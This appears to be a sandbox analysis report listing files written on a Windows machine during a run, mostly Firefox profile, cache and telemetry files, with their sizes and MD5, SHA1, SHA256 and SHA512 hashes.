9d03857c0de2e010b71c7ea7846f24cbc6a16ed2130cb90e9a60ecc86d5bd0929bbab1b91eef1ae41bb7ffac7a880743ff8dd92d2ecea7145e4c64cad906e359

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\p38rro19.default-release\cache2\entries\6D89348819C8881868053197CA0754F36784BF5F

Filesize
14KB

MD5
814e336eceb0eb65a338303ff3ad057f

SHA1
185572caa4daf6dc6146c5fb2fd585a4ba6c3ea0

SHA256
e3990287da19823ae2a2cd09f1991664b1774f00b1772e31202ffbd21701b8ca

SHA512
68b716ba1f4e5f3150177ffb3a798376224983fd38e34140f1b6ddb35be14c375f8938226931a08621f7f71a490797ebe2c8dacdacf26e3eb36bbb9c21aeef1d

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\p38rro19.default-release\cache2\entries\7BFCF32544F467F973AF267DF4EB4842EDED0C1F

Filesize
16KB

MD5
b2357aac879f6c5c8b178c487f237b25

SHA1
b2deb3f708914b0dcbd14138b4a6ea2690c67af3

SHA256
40aae21402fd82db52597e0bc2d9e368d957bd834cb6e0e491bd8dc3dd10d016

SHA512
9a4570ac224683181a9b3c0418279bd171d000bbb31b0d91759c4ac35d08f0d2811da8987f5fabb3f29b8dff7cf45fad9b792bd6429cd507b4f7a621dc245980

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\p38rro19.default-release\cache2\entries\A20AE0232DCA9224C00DEC2D87BB9EE7EA1B1A96

Filesize
15KB

MD5
6523339d8855fd4f4e6435e56544e741

SHA1
bb12bf45c641f17d83bde0c19ad8fbad4701d5ac

SHA256
1fe6e4b34b45de170c79299c84db6aa8b16840d14b29f44f03e841c97d082f14

SHA512
6302e3d4d78b8ecf4e747490a29943e32e42e0c0493f11dc8903c18a33b3825c6a33addc29fc5b345e0b94c884341592b3203f7941aaed25747ac4e45da7cec9

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\p38rro19.default-release\cache2\entries\F8CBD54DDA10F4286A41EC6A537240712D6C2308

Filesize
9KB

MD5
1ffc28b561db96fb9828c74f462bee5f

SHA1
07789453b5f6921451da999faa39bb722e232d26

SHA256
d5ca15ae067379d00dc97b8865080480cbe5fa30ef1591698d02b8b0ba8f9257

SHA512
293b9d2f7891faea74aeec72fef9e0fc41e955a4aec3db10d44595740866a11dbc6e3a30b539ba4674bdf01a45a67b586ca5cdef19808f77331989ea2d595d42

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\p38rro19.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

Filesize
15KB

MD5
96c542dec016d9ec1ecc4dddfcbaac66

SHA1
6199f7648bb744efa58acf7b96fee85d938389e4

SHA256
7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798

SHA512
cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\p38rro19.default-release\startupCache\scriptCache-child.bin

Filesize
486KB

MD5
182245e2424abb1498c41041be3c7716

SHA1
324e21d1e74adbb55071c9df79892aece754fbeb

SHA256
42ff48fd0bc943147ca7ab52d3b46d1beeef06aaec775c33e302effdda976506

SHA512
f28def2b4ce4b8e5ca627904589717d3d5f9643b90cddcb979475c02d25a97cc30818e0c36184c8d83c3b74624a2e3f0745dddca67a0e7c37314baa86ebfb885

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\p38rro19.default-release\startupCache\scriptCache.bin

Filesize
9.2MB

MD5
e612e72a1a34c155f00e59bfd7e586ba

SHA1
b6a6e27fb5421309807b79890dd3d70efd2b3510

SHA256
bd65168cf676655c360e1fc56f263762bee56d42676ee9e812e6bd2674a51c07

SHA512
a2fc66d3d45f4dc4137257daf22aa01b3b905b08be91a6cc897d1fc3806d804adfeb5fd98d4f7aef23fee58ea766247aa83fff51567298f6e1a6ee94d29056d2

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\p38rro19.default-release\startupCache\urlCache.bin

Filesize
3KB

MD5
06404ec14954b50b77e1af7687dc0edc

SHA1
f16b78d48edab086c18a066f72291cf5c24a9f02

SHA256
7734637a9d31856de404418fe409ed5d2e189affde04e02184bc126f2dde837d

SHA512
8c3cfc8788b8e519feb9a9241cc646af26c17fd8bdacb899330860bd0bfb21bdef3635e87be1cce2512a102de2c6ffdee90c7f247b98a79ad2e0578fc4f2761a

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\p38rro19.default-release\startupCache\webext.sc.lz4

Filesize
107KB

MD5
fff34a596572b0047349ba0b14334db0

SHA1
ef7de986663290fd1d24f5850ca17c99e2468420

SHA256
8868de9163547d180953fc0189f670bfe0de003f5335ab095a67fdd4dfdcf449

SHA512
9d5564eac6d5bc31c2449fca06f5984cccaae3dff9ee7faba984cd55aebf5480eb05aaf080291c5c93e062f357b40cd6fd86d8cee31dab60b3e8e3b4317b534c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nqlpi4ne.iqh.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon

Filesize
479KB

MD5
09372174e83dbbf696ee732fd2e875bb

SHA1
ba360186ba650a769f9303f48b7200fb5eaccee1

SHA256
c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f

SHA512
b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

Filesize
13.8MB

MD5
0a8747a2ac9ac08ae9508f36c6d75692

SHA1
b287a96fd6cc12433adb42193dfe06111c38eaf0

SHA256
32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03

SHA512
59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Spelling\en-US\default.dic

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms

Filesize
5KB

MD5
dbe2034497bc2f4c2399f61f1f6c3b71

SHA1
ada532a5b1aaf825d70a47f423faf58219439ab9

SHA256
508892de45f9d9f673a574d2f99098abc930a739706bf3507f921d4c9a1de990

SHA512
e8b531e58e14d5ee03882e6d2725a865bd7e9080a806ca9fbb008de8297024e23cdeab6b798faa9548532b7affd0d0d618ec1daf2803ffc1032bbb7dc93269dc

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms

Filesize
5KB

MD5
ec81ee85812fcd5c885e82446588663e

SHA1
27ba082c5ce43fca84ce78310217eda8b60b46ad

SHA256
42ec7adb99c5e82fbca3e6a13216fc4607e5c1a1255deb6ce51522fda725562f

SHA512
8c14abd278fd7fff833873289b0bf3b7849e9d156f3800efff037bceead0fcd0ce9dca074c2859195950dabc12a187634d23ee2a57c92336c6bdb1280ff53f20

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
10KB

MD5
f9256385d30bb6f784717c19917ad895

SHA1
4d171349634da8875fba16331730b98eca94cd79

SHA256
7d619eadd8769830307b49210fa9900c48bdfaa179195eb34087a29d729491b2

SHA512
691891b065f4a2dd86d91ece800f7cd7f949d42268627703e50227d6714b507e099c34aa6bbcc318134b3b7843b6e6cc60e3df75b72b6a4dd3db194977c2a2b1

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
10KB

MD5
2be7f1cb3adf4f89c99a55cbcd48c730

SHA1
5218e24e6fbe948ba898f51d2397218fdb62be7b

SHA256
adade2504e6803a3e5cf4b61e2a88e7b7b3ff9f7f95ac6d00403069b805fa6d6

SHA512
cefd50aad975837064abb0d717e437cb1314b1d5366cf7cc4ec76d77346315a2b24cbccd94b1d3d994ff14b95c287e41f36e1fd44e444e0f5069cd556c250627

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2pt2tt19.default-release-1735321524803\AlternateServices.bin

Filesize
7KB

MD5
7d5dbfaa2a515632e67cba9f1ebfec7d

SHA1
d5d14ddf6ada99d9dfb239c617bfa4fe215c886c

SHA256
09d1eb7f20062bd6133bcba39987bf466c01219df570eb51fb5990230195c581

SHA512
bce99eae21f8b8d5ec07018ae8a8bfbb65750a608837ff569bdcba20fa56d6f56c3fc6f1e5db8a7161e6da6fe6348c227f0f36d1c38ed7c599291f963dd85d84

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2pt2tt19.default-release-1735321524803\datareporting\glean\db\data.safe.tmp

Filesize
6KB

MD5
5464042796d1b6a47a66880d3575bf36

SHA1
d8637166170ff5c0a9b072533f95aae8b0fd0cbd

SHA256
9c46fa6a8fff236e382a36b7eafcb755be020e708789ed420836c06c2890d996

SHA512
609142c0a04bb4f79e08e94065102444c9962c1acf8c569a8ad904d21361fd1bb2d7be0264c1014608e81d113db71f992cb047272e23f458b8fd74e7e821a69f

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2pt2tt19.default-release-1735321524803\datareporting\glean\db\data.safe.tmp

Filesize
6KB

MD5
3fb01560f1d5a43aff5380b31a5181f1

SHA1
6b9636c1562cef44c4be83e0b27ae75d0e635eac

SHA256
f623728ab10dceebf409669dd5b99d8f831b2de4305c047b19bc652398805eaa

SHA512
916182aa6926ca14cefa19f839365464852138ddc5a6516cb0f9e52d21ec0f20bd9aebdf3d4325cf148a3e11da5ef34bd267c8015da64cd036c8062ad4f58890

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2pt2tt19.default-release-1735321524803\datareporting\glean\db\data.safe.tmp

Filesize
6KB

MD5
8b7d7a3d19b32db8cbc37c2206f16154

SHA1
027c494a11bb6e137a044e293ae9531121009795

SHA256
1ce233807f29e028c5686cd8adc0bf4f0dc38de637593724ad68e87f779fa8de

SHA512
96fdf122c1fbc713bf847108d0eed6c709b0ef3dcac600405b020f1fbd7fd477c90d6d09eeda926580087ddb731b30c4a794b46f07a866ad79dfd63d04cb760d

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2pt2tt19.default-release-1735321524803\datareporting\glean\db\data.safe.tmp

Filesize
6KB

MD5
859f1f61a460ae152f680d1bbe914dc0

SHA1
5f2fef9bcf1332840c8dbad57716389e76c4e600

SHA256
82ce26bc9603c2f92a4bbb187f7f200d208e8355608ad597432b43810fc15be9

SHA512
953299111c00109b3b8611947d03b925644cfdeb04bdb99d3a0c9f9ed07769d9275767181f0fce8f51ec4d83cc15ce86dad45611c3061bccdef8ea0475cfdabd

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2pt2tt19.default-release-1735321524803\datareporting\glean\db\data.safe.tmp

Filesize
28KB

MD5
d5d5ddc744a147a405ad78e8eccc681b

SHA1
891acaa880799774f4b9b31e05bb9684f97028db

SHA256
ceb35260e02c49d30f7176a28c003072421999017cc5293fc6722573924fb20b

SHA512
02571923ed52269d1b6e3074a3d8af678de2cd0f34357973e8130c9abcde36960e3d29838ef7d562964cc9999e77d488040aa120f282769a0df56f041512edb8

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2pt2tt19.default-release-1735321524803\datareporting\glean\pending_pings\46d028e2-6446-4a4f-9825-a53806f4a106

Filesize
655B

MD5
9f42e19692d1d43fe97718b09474425b

SHA1
a09f55ec1ab5efb393e26c3668ed7b599971c1e3

SHA256
898e39f51462c04715ad314c436e9e45e469506a0088309499b1855b93c876dd

SHA512
2228a6c377cca584892f3fc0f646947c8cf55174b3b11ebba20ec565c22e0e71cb5bbadd9a3a01ede157cb397aaa255f2d03b7ad33a5b666b5dfa21073b8ba5f

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2pt2tt19.default-release-1735321524803\extensions.json

Filesize
34KB

MD5
75d59f08ef50f6a442daf6334dec23cc

SHA1
9034a7bbae5366d431484f9eeab152f33e0b48e5

SHA256
b1062a74b7827c29cfc201a514cfd19ec6a48402605c2b78b40266a25d968388

SHA512
d223869ec12ab096dc41de3b55749271b53520d3d0636b8e697ba01c9af225d911685f9a7d0a3aa653b26ff13f0ac03cf1fb11f4ac95253abf306c61bf8fe6dc

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2pt2tt19.default-release-1735321524803\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

Filesize
1.1MB

MD5
842039753bf41fa5e11b3a1383061a87

SHA1
3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153

SHA256
d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c

SHA512
d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2pt2tt19.default-release-1735321524803\gmp-gmpopenh264\2.3.2\gmpopenh264.info

Filesize
116B

MD5
2a461e9eb87fd1955cea740a3444ee7a

SHA1
b10755914c713f5a4677494dbe8a686ed458c3c5

SHA256
4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc

SHA512
34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2pt2tt19.default-release-1735321524803\gmp-widevinecdm\4.10.2710.0\manifest.json

Filesize
372B

MD5
bf957ad58b55f64219ab3f793e374316

SHA1
a11adc9d7f2c28e04d9b35e23b7616d0527118a1

SHA256
bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda

SHA512
79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2pt2tt19.default-release-1735321524803\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

Filesize
17.8MB

MD5
daf7ef3acccab478aaa7d6dc1c60f865

SHA1
f8246162b97ce4a945feced27b6ea114366ff2ad

SHA256
bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e

SHA512
5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2pt2tt19.default-release-1735321524803\key4.db

Filesize
288KB

MD5
3e6aab67687a7971850641d0465d5911

SHA1
5148ab92a4747ea4be1e27d8a216d16a0526243b

SHA256
a46273bddb24bbdbbd7d466f856912686ea314d5e7dff8222a4c20eb2ee3230c

SHA512
b56716db0064a13acc0fcb5594a9b48d80b07dc3b9b885676fc2111d5ad190372e56bf5bc4c6eddb888de51e6f96c7743b209a9170def06e44088eeb5b17a8ef

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2pt2tt19.default-release-1735321524803\prefs.js

Filesize
10KB

MD5
5aabd3dcc2b78e424a4a7ab521ca8ef4

SHA1
1bda73ce8710b473f310ee4dc179b82180ec9c23

SHA256
97e1d4ea7672a6e958d345fe26fa6ad02a3bd503b39f703ac9061980138ead39

SHA512
02dffa8faa4e34ec812f902bf2240351ebba7a3c42221e29f962f72a28ef49c810124723b1a68dc34c9252860b78c60ea29d2012c22d06d27e40575e0d0ec9e7

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2pt2tt19.default-release-1735321524803\prefs.js

Filesize
9KB

MD5
e27c738ad209c7f2aa14743e88690d22

SHA1
6a8d565c69de8371ae1e334afe4202e3702f10db

SHA256
5d0e0e86981595804423adee61f82650a93ed55f1db2790661dca50b1f743add

SHA512
a660fbe6ca9d4e0d8ce3d7a3333a057d19ee8641d4d43e98429d55e330a54e1e8dcc55319b2ccb76a82278d3dbc9ce984551a6390d69088155f6205f95a4c164

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2pt2tt19.default-release-1735321524803\prefs.js

Filesize
10KB

MD5
11b60b434acce564191faea2b622cdc6

SHA1
ac7da994e4a3ef786671f938f1ec02f78452ae3f

SHA256
87ac0285596094845812702321b20100678fbecfc87b80e526c6f6777a89820f

SHA512
38ff45fcf622b7f7096593d0dd2a0e71d86a622634f51e759969cb3d021fcbe404314937119f8c8cc8784e4eede3c6d2a765bc755f770f8e0bb70ffdec4df806

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2pt2tt19.default-release-1735321524803\prefs.js

Filesize
1KB

MD5
dd28643b311c773fa3e9e06fa1bea75a

SHA1
d65e4fec36eb9918c6a9fa0fcb7d8d16ac63b27b

SHA256
2d344772a64d4835a3fa2fcb1b3fe3cd311a79d320dd3c6344ab99d399c53a70

SHA512
5dd55cededaf8590923c6f9bcae3ece27a2b8d57e9f6fb3cc424854a547fdb283e743f4ad1ba6f7e599ac9708b003999ce0257b8fe4b591f3ed487e357f13360

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2pt2tt19.default-release-1735321524803\sessionCheckpoints.json

Filesize
53B

MD5
ea8b62857dfdbd3d0be7d7e4a954ec9a

SHA1
b43bc4b3ea206a02ef8f63d5bfad0c96bf2a3b2a

SHA256
792955295ae9c382986222c6731c5870bd0e921e7f7e34cc4615f5cd67f225da

SHA512
076ee83534f42563046d25086166f82e1a3ec61840c113aec67abe2d8195daa247d827d0c54e7e8f8a1bbf2d082a3763577587e84342ec160ff97905243e6d19

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2pt2tt19.default-release-1735321524803\sessionCheckpoints.json

Filesize
90B

MD5
c4ab2ee59ca41b6d6a6ea911f35bdc00

SHA1
5942cd6505fc8a9daba403b082067e1cdefdfbc4

SHA256
00ad9799527c3fd21f3a85012565eae817490f3e0d417413bf9567bb5909f6a2

SHA512
71ea16900479e6af161e0aad08c8d1e9ded5868a8d848e7647272f3002e2f2013e16382b677abe3c6f17792a26293b9e27ec78e16f00bd24ba3d21072bd1cae2

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2pt2tt19.default-release-1735321524803\sessionstore-backups\previous.jsonlz4

Filesize
260B

MD5
84e74ab94318c2617efa5b319fbca28a

SHA1
a0dc3d3cc402a68cf0eed10bdc3673a53c25aa3d

SHA256
7cfb239dec7ec4dc233942503850065af7a2ee420724de6c23a0d3083be9794a

SHA512
27eafb0885df2456bec55e4b88bfa24f3a4643f761f07b3d761a6ecd1b1c587ed3534f1d52afece1ca8d30c4b06344fceb1fa54a3ded3eb5e048e752309b3915

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2pt2tt19.default-release-1735321524803\sessionstore-backups\recovery.baklz4

Filesize
865B

MD5
6f32979beb3bfe8a93b0ad3ff424a744

SHA1
0bf6be535a6974a75cd6b01b13b45ab49f24c0ad

SHA256
3b443724c21cb65ad5169aa82f3e096ee06028aedd6075588d107945552543ae

SHA512
29963eaccaecd306f45b81031de84f5c8ace8eeea572847e5506b2e68404b0edd334c83170581ce9d9941958a4a92eace18091e894944d64a5d7d8dbefc9303a

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2pt2tt19.default-release-1735321524803\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

Filesize
344KB

MD5
c10e2117cbece7e269fc4d382155ed81

SHA1
3959b273bf9d24859a01780e52d9c8e7bd405df5

SHA256
2668f9c8d3397b50cc8dc74e4915e2992e9bffe40afc432165e4720ab4726837

SHA512
73e2cb8b4942b231cd91a1e202ba16b8df1844bfa2eb3806e025481725e2f7381cfbede5f1e73f75d6f65d004e00c0d3a5542a35eadff13f40321d7872c769f6

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\AlternateServices.bin

Filesize
6KB

MD5
6e040e0b858a6d96c04e259d8a136e28

SHA1
a2dda4c0c0a361cb859f67fc7e89574a0edcea49

SHA256
4c66ce8f352c763d4e45d59c26bf8568aeef60a53d0db3cc1748a0ee203736de

SHA512
3c85ca752cee680a9a64be0ddac6b6e73d2e2df87832c5983cc592f1821faf2be1aded977a514b1c2c1c40385d56c22731a88461d064080ff785a76919054e11

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\SiteSecurityServiceState.bin

Filesize
858B

MD5
740e3a7ad881157c1d0e63e6a1906bbb

SHA1
05d1423a64bfc4ff3f6e7d22479d28ac85190d2e

SHA256
d4e1208346114cecdaf566a14f679bb069f65ebacde69e8ea4f0a00549004874

SHA512
a0209198460aea89eac8707d073828e2acc910d335b85a86890b0a83c9992f538fbff2c2fd5d50161ae50d8c7ffdecabeab3d0467569dd04b21d0c592330fd49

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\content-prefs.sqlite

Filesize
256KB

MD5
b5acd9cf58ba89e643e7b2e839e0707e

SHA1
82c2b9cbea4acb50b446b786818287be7b0b8b61

SHA256
4d4fd87f1cdccc9f826ab7de2b3980db6fe4ed328f079ceb24f680557da9667e

SHA512
1fdaf5173a2fa956e3793b3643b44d928a4c81a1599bdf4b057396bfca5948ce1097194dbb5f528959c8cf4e34d058922828236c6060b41510e9ea2cb9ed424b

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\datareporting\glean\db\data.safe.bin

Filesize
17KB

MD5
931c2b7150ab31dfa2d9afc6476255e4

SHA1
65fec76f902b1f6b19033d5dda35cfcbbdc5fcaa

SHA256
3ea2d7542ebb5f5f330c4ade858af1c14ab749ba14414183b41277c5f2c582bd

SHA512
24a35fd878ec7c7a5d0f651d6a2dbd9a143c79b20266fed4e50df44b6db2e774b748de5bed674ed6608126a5118e5037932b7f0a648d8a4ba2de2ed61693af47

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\datareporting\glean\db\data.safe.tmp

Filesize
5KB

MD5
31ae354591243cb5dab8c9c7fc9182ac

SHA1
b2ce22f2a80eefb9a4827cf847b576dab48b27a0

SHA256
d7aaa2e77318d16edd374ac0922d5e7d1a2b321b1dc144f042ae4d1142a65ccd

SHA512
257d857b72e7e3acfe177fd8a6ea22eb3faf70f2deb40ca49b5d5dbd99468d610f9d33d82c93196a69800d8d0406f2af89b9885daede9174aafaedb733bc18ce

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\datareporting\glean\db\data.safe.tmp

Filesize
5KB

MD5
c55dc10a4b5d1f5952de0b3351091fc1

SHA1
ccc19e5a49ca494b06824f8fbfe0d62d055ab76a

SHA256
d9741f298fe55b1de71a83fc6775d8bce7b3df6567dfab33e4dd0699b4beffe5

SHA512
6617ad962f21eb45e5482ffd4e336fce5cfe0adf2311f042f1e1ff4b9705b423c728b94d3476fcfaa7e28c296f113356675dfd954853eb02f1abb68669ece303

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\datareporting\glean\db\data.safe.tmp

Filesize
6KB

MD5
f6b73e7ac8a9bb357ede1ecd5e7dd7b0

SHA1
013cc2bcc12c2fe5657fc9a74932efda259287a5

SHA256
d2a54779e588c10b1251f33717d0a68ddd3efa33b5cf3ffadd10f816dbe2e939

SHA512
14934c36f747e9ecf223d38f9bcffd75e62d896979b273d0079dd3dbf895c556ad2c10d5316a039f3f2b383ab102ccd886d7fa22ee11315c081e4fd990ca3c0d

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\datareporting\glean\events\events

Filesize
104B

MD5
defbf00981795a992d85fe5a8925f8af

SHA1
796910412264ffafc35a3402f2fc1d24236a7752

SHA256
db353ec3ecd2bb41dfbe5ed16f68c12da844ff82762b386c8899601d1f61031d

SHA512
d01df9cab58abf22ff765736053f79f42e35153e6984c62a375eb4d184c52f233423bb759a52c8eed249a6625d5b984a575ca4d7bf3a0ed72fc447b547e4f20a

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\datareporting\glean\pending_pings\13910f0c-1223-4be7-8d07-2be194dcb83d

Filesize
982B

MD5
3caaf19f5807b00e43726c0d278da012

SHA1
3d3c8720bd7a68ef5e78787f6409686ae751bb60

SHA256
ea5cda98ccd3bdfafad42536432e4f07e28db028a9f54a106f17086d131c2a14

SHA512
7fad19f4d3ec396410ec353453d460d71289fb5312a7b9a0ffd6ca87d0a24db9b866513295fa4512b693af5051d0f26726ea6662913495982a4c5a7c6cb014ee

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\datareporting\glean\pending_pings\923eea8e-fc93-4e6b-9afd-9809119a160e

Filesize
25KB

MD5
8d2b9d75398070ceaac3cd2bcc30284e

SHA1
2ac3e670510bf78f463cf9f9c6a0a8b3052ec5df

SHA256
775c614fc2bdbad133dbd205ff3784fbdff93d7e718e80241759d37150f933d5

SHA512
503ae4edfa40422c12d4eeded89d087778671bda4719c0aaeb4f12d447f7a8d004b366594f562f226a9d88668a8aa5c0b13e4366377668427a7934b1fa31c30e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\datareporting\glean\pending_pings\d3a88db4-99a4-4209-ac66-069dc64c604f

Filesize
671B

MD5
7b178d6c2412b77972a0c3890aede53a

SHA1
435e52f2617691fdc758675e48aefbb47f8701e4

SHA256
f6bad642efc5eccbe9793e0d811a0ad18c307120bfb58b50357b7049567b963b

SHA512
065e0264ea01dfb206ff359198503e4f13cc8672884f781b08c993acd360db3ff44a574589b2078516b677ca88d3c85c51369bfea9129c127c252ae562cd3dc2

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\prefs.js

Filesize
10KB

MD5
adcb7b500ec9d07d3ec3fa246744cd23

SHA1
e3d8422c4af2167898821e657b4a1335fef55a1f

SHA256
abd5ac842ff44302cb00bfc5f0d2bf387e4c10ae49bab1f8e7816a4b0ac890d8

SHA512
cd3f72da2ce2e79e822f0e59a40b78859089f4a9e893d1a73b811231897c82d0c76e4fb5fcd109caf709a2801e630645fc352242cf37dc62a07f6a6aa18bd97f

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\prefs.js

Filesize
10KB

MD5
22931d1d9d0a4e555f1b0fd86a37bef3

SHA1
9aad17a8fd8c2116741a82f8ff4da00655212848

SHA256
26de1c3576555d72f40fa550d9b3f2f52c2fd8fe6c46f69198b7776efe411fa2

SHA512
917887d3de4bd3259bcde63066d2e4f4177cefaf031fee1a6bade6f2ac6869b57eb13c66729bcf11df8a9ad52e1bdc06d5b56124cd56da17b6a3470c996efbb9

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\prefs.js

Filesize
10KB

MD5
9adb35fb2933bcaecb0e516700d9825a

SHA1
baf08c8f6f54dd76564669dcf3413353f0fe9c65

SHA256
42aa51457cc2fec8f2df5579d0e90b39cd699d7660192bfd563a27b2596ddc56

SHA512
29332b3f2b86720cf74c658a887a7fc85101f94f4aef92207c2c7b0bbd5af2314387759bfe75852633425a1b7a2fca97d44f5fcfca920fd96935a188bd8c2d74

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p38rro19.default-release\prefs.js

Filesize
10KB

MD5
9a410a8e129a498fd0c8edf1524ee1ab

SHA1
c694f7e865d2cdc4e601988928531347e4c9b1c9

SHA256
194b46605275402d2df71443bd201f05183efd6c3fdc50f8ec47b6a891d22d66

SHA512
f6e6f8b2a7b0f08bf8f3b7bb233441d01e50915fd0633a58ce56db129d0eb2a23e32e72af3397c53932cf8f57a9c403b7557bdff02d2c34bc22f21e5fe762b12

Download Submit
